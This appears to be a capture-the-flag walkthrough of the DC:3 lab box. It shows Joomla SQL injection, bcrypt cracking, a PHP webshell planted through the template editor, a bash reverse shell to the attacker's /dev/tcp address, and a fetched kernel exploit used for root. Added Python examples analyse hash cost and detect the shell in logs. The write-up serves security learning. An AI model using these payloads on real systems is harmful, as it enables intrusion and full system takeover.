We have finally reached the third machine of the DC series. There is not much time left before Lunar New Year and I am not sure I can finish the task. A colleague reportedly went through dozens of OSCP practice boxes in just a few weeks, averaging two to three a day, which really shows how large the skill gap is; the main difficulty, though, is that this generation has far too many distractions. Enough chatter, let's get started on DC:3.
Environment setup
VirtualBox: Kali & DC: 3
Net Config: NAT Network
Finding the target
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-24 14:31 CST
Nmap scan report for 10.0.2.6
Host is up (0.0072s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
Directory brute-forcing
┌──(mksyi㉿kali)-[~/下載/dirsearch]
└─$ python3 dirsearch.py -u http://10.0.2.6/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,htm,html,sql,zip,tar,rar,7z
dirsearch v0.4.1
Extensions: php, htm, html, sql, zip, tar, rar, 7z | HTTP method: GET | Threads: 30 | Wordlist size: 220520
Error Log: /home/mksyi/下載/dirsearch/logs/errors-21-01-24_14-40-38.log
Target: http://10.0.2.6/
Output File: /home/mksyi/下載/dirsearch/reports/10.0.2.6/_21-01-24_14-40-38.txt
[14:40:38] Starting:
[14:40:39] 301 - 308B - /templates -> http://10.0.2.6/templates/
[14:40:39] 301 - 304B - /media -> http://10.0.2.6/media/
[14:40:39] 301 - 306B - /modules -> http://10.0.2.6/modules/
[14:40:41] 301 - 302B - /bin -> http://10.0.2.6/bin/
[14:40:42] 301 - 306B - /plugins -> http://10.0.2.6/plugins/
[14:40:42] 301 - 305B - /images -> http://10.0.2.6/images/
[14:40:42] 301 - 307B - /includes -> http://10.0.2.6/includes/
[14:40:43] 301 - 307B - /language -> http://10.0.2.6/language/
[14:40:44] 301 - 309B - /components -> http://10.0.2.6/components/
[14:40:44] 301 - 304B - /cache -> http://10.0.2.6/cache/
[14:40:45] 301 - 308B - /libraries -> http://10.0.2.6/libraries/
[14:40:55] 301 - 302B - /tmp -> http://10.0.2.6/tmp/
[14:40:56] 301 - 306B - /layouts -> http://10.0.2.6/layouts/
[14:41:09] 301 - 312B - /administrator -> http://10.0.2.6/administrator/
[14:42:29] 301 - 302B - /cli -> http://10.0.2.6/cli/
[14:48:17] 403 - 296B - /server-status
Walkthrough
DC:3 exposes only port 80. Browsing the site shows it is a Joomla CMS. This time the hint says things are different from before: the box has only a single flag, and you must obtain root, so the plan is presumably to find a Joomla hole and go straight to root. An account named admin can also be seen on the page.
Get Shell
Since the version number was unknown, this made things a bit more troublesome, but time is the attacker's friend: after some trial and error I found that CVE-2017-8917 applies, which allows SQL injection.
An online exploit retrieved the admin account's details and password hash, but it is bcrypt, so brute-forcing would take a great deal of time and be inefficient, just like Drupal in DC-1.
[-] Fetching CSRF token
[-] Testing SQLi
- Found table: d8uea_users
- Found table: users
- Extracting users from d8uea_users
[$] Found user ['629', 'admin', 'admin', '[email protected]', '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu', '', '']
- Extracting sessions from d8uea_session
- Extracting users from users
- Extracting sessions from session
I looked for Joomla-specific ways to recover the password without any breakthrough, so in the end I went back to basics and simply tried cracking it, using the tool john.
echo -ne "\$2y\$10\$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu" > admin.hash
john admin.hash --wordlist=/usr/share/wordlists/rockyou.txt
Surprisingly it cracked: the password is snoopy.
┌──(mksyi㉿kali)-[~]
└─$ john admin.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy (?)
1g 0:00:00:06 DONE (2021-01-24 15:42) 0.1508g/s 21.26p/s 21.26c/s 21.26C/s snoopy..hunter
Use the "--show" option to display all of the cracked passwords reliably
Session completed
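The john output above reports "Cost 1 (iteration count) is 1024" and a rate of 21.26 candidates per second. As an added example (not part of the original write-up), the following Python parses the dumped bcrypt string to show where that 1024 comes from and projects how long exhausting a wordlist would take at the observed rate and at higher cost factors; the rockyou.txt line count is an assumption.

```python
import re

# Admin bcrypt hash as dumped from this box (value taken from the write-up above)
ADMIN_HASH = "$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu"

# Rate john reported on this run: 21.26 candidate passwords per second
OBSERVED_RATE = 21.26
# Approximate number of entries in rockyou.txt (assumption, not from the write-up)
ROCKYOU_LINES = 14_344_392

# Modular-crypt layout: $<variant>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)


def parse_bcrypt(hash_str):
    """Split a bcrypt string into its fields and derive the key-setup work factor."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a bcrypt modular-crypt string")
    cost = int(m.group("cost"))
    return {
        "variant": m.group("variant"),   # 2y: PHP password_hash(), which Joomla uses
        "cost": cost,
        "iterations": 2 ** cost,         # john prints this as "Cost 1 (iteration count)"
        "salt": m.group("salt"),
        "digest": m.group("digest"),
    }


def hours_to_exhaust(wordlist_lines, rate_per_s):
    """Worst-case wall-clock hours to try every wordlist entry at a given rate."""
    return wordlist_lines / rate_per_s / 3600


def hours_at_cost(cost, measured_cost, measured_rate, wordlist_lines):
    """Project the worst case to another cost: each +1 doubles the work per guess."""
    rate = measured_rate / 2 ** (cost - measured_cost)
    return hours_to_exhaust(wordlist_lines, rate)


if __name__ == "__main__":
    info = parse_bcrypt(ADMIN_HASH)
    print(f"variant={info['variant']} cost={info['cost']} iterations={info['iterations']}")
    print(f"rockyou worst case at cost 10: {hours_to_exhaust(ROCKYOU_LINES, OBSERVED_RATE):.1f} h")
    print(f"same wordlist at cost 12:     {hours_at_cost(12, 10, OBSERVED_RATE, ROCKYOU_LINES):.1f} h")
```

The password here fell in six seconds only because it sits near the top of rockyou; the full list would take roughly 187 hours at that rate, which is the point of a slow hash.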
Because I had scanned directories in advance, there was a suspicious path, administrator, and visiting it shows it is the Joomla admin backend.
Log in with the cracked password. In the backend, under Extensions > Templates, Joomla files can be edited directly.
Use this to edit index.php directly and plant a webshell.
<?php echo system(@$_GET['a'])?>
Then start a listener and pop a reverse shell back.
nc -nl -p 8080
http://10.0.2.6/templates/protostar/shell.php?a=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.0.2.15%2F8080%200%3E%261%27
- This part took a long while, because I am not familiar with the Joomla framework. At one point I assumed the file sat under the web root, but it is actually under templates; I spent ages looking in the root and kept getting 404s in my face.
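From the defender's side, the request above is exactly what the Apache access log records. As an added example (not part of the original write-up), the following Python flags PHP executed out of Joomla's template and asset directories and shell-like content in decoded query parameters; the log lines are constructed, with the first reproducing the request shown above and the others being benign.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines. The first carries the path and
# query from the reverse-shell request above; the other two are normal traffic.
LOG_LINES = [
    '10.0.2.15 - - [24/Jan/2021:16:02:11 +0800] "GET /templates/protostar/shell.php'
    '?a=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.0.2.15%2F8080%200%3E%261%27'
    ' HTTP/1.1" 200 512 "-" "curl/7.74.0"',
    '10.0.2.15 - - [24/Jan/2021:16:01:50 +0800] "GET /templates/protostar/css/template.css'
    ' HTTP/1.1" 200 10512 "-" "Mozilla/5.0"',
    '10.0.2.15 - - [24/Jan/2021:16:01:55 +0800] "GET /index.php?option=com_content&view=article&id=1'
    ' HTTP/1.1" 200 8012 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Directories Joomla serves assets from; a .php file here is worth a look
PHP_IN_ASSET_DIR = re.compile(r"^/(templates|images|media|cache|tmp)/.*\.php$", re.I)
# Substrings that point at shell commands inside a decoded parameter value
SHELL_INDICATORS = ("/dev/tcp/", "/bin/bash", "/bin/sh", "bash -i", ">&", "nc ", "| sh")


def analyse(line):
    """Return a list of reasons a log line is suspicious (empty if clean, None if unparsable)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    reasons = []
    if PHP_IN_ASSET_DIR.match(url.path):
        reasons.append("php under template/asset dir: " + url.path)
    # parse_qs percent-decodes values, so the indicators are matched on plain text
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        for value in values:
            hits = [ind for ind in SHELL_INDICATORS if ind in value]
            if hits:
                reasons.append(f"shell indicators {hits} in parameter {name!r}")
    return reasons


def suspicious(lines):
    """Pair each flagged line with its reasons."""
    flagged = []
    for line in lines:
        reasons = analyse(line)
        if reasons:
            flagged.append((line, reasons))
    return flagged


if __name__ == "__main__":
    for line, reasons in suspicious(LOG_LINES):
        print(line.split('"')[1], "->", "; ".join(reasons))
```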
Privilege escalation
Now that I have a reverse shell, it is time to look for a privilege-escalation route.
SUID check
www-data@DC-3:/var/www$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/ping6
/bin/ntfs-3g
/bin/umount
/bin/su
/bin/fusermount
/bin/mount
/bin/ping
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newuidmap
/usr/bin/newgrp
lsb_release
www-data@DC-3:/var/www$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
uname
www-data@DC-3:/var/www$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
CVE-2016-4557
All I had here was the OS version and the kernel version. Searching with 4.4.0-21-generic as the keyword, the first few exploits that came up hardly worked at all; in the end I found 39772 directly on Exploit-DB, learned from the Source information in its text that this is the CVE-2016-4557 vulnerability, and gave it a try.
www-data@DC-3:/tmp$ cd /tmp
www-data@DC-3:/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
--2021-01-25 04:35:10-- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Resolving github.com (github.com)... 13.114.40.48
Connecting to github.com (github.com)|13.114.40.48|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2021-01-25 04:35:11-- https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.228.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.228.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'
0K ...... 100% 172K=0.04s
2021-01-25 04:35:12 (172 KB/s) - '39772.zip' saved [7025/7025]
www-data@DC-3:/tmp$ unzip 39772
unzip 39772
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
www-data@DC-3:/tmp$ cd 39772
www-data@DC-3:/tmp$ ls
crasher.tar
exploit.tar
www-data@DC-3:/tmp/39772$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC-3:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
whoami
root
After some fumbling about, I finally got root; the-flag.txt can be found under /root.
cat /root/the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!